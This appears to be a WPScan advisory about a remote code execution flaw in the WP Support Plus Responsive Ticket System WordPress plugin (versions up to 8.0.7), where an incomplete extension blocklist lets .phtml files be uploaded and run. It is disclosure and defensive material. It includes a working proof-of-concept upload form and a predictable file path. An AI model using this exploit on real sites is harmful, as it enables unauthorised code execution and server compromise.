WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution (RCE)



Description
WP Support Plus Responsive Ticket System <= 8.0.7 allows anyone to upload PHP files with extensions like ".phtml", ".php4", ".php5", and so on, all of which are run as if their extension was ".php" on most hosting platforms.

This is because "includes/admin/attachment/uploadAttachment.php" contains this code:

    switch ($extension){
        case 'exe':
        case 'php':
        case 'js':
            $isError=true;
            $errorMessege=__('Error: file format not supported!','wp-support-plus-responsive-ticket-system');

But it does not check for other extensions like ".phtml". In addition, it saves the file with a predictable name based on the timestamp, and anyone can load the file and run the code it contains.

Plugin author notified 2017-11-09.
Proof of Concept
<form method="post" enctype="multipart/form-data" action="https://example.com/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="wpsp_upload_attachment">
    Choose a file ending with .phtml:
    <input type="file" name="0">
    <input type="submit" value="Submit">
</form>


After doing this, an uploaded file can be accessed at, say:

http://example.com/wp-content/uploads/wpsp/1510248571_filename.phtml

Affects Plugin

References

URL https://plugins.trac.wordpress.org/changeset/1763596/wp-support-plus-responsive-ticket-system

Classification

Type RCE
OWASP Top 10 A1: Injection
CWE CWE-94

Miscellaneous

Submitter Robert Mathews
Submitter Website https://tigertech.net/
Submitter Twitter @TigerTech
Views 5893
Verified No
WPVDB ID 8949

Timeline

Publicly Published 2017-11-11 (over 2 years ago)
Added 2017-11-12 (over 2 years ago)
Last Updated 2020-03-08 (4 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin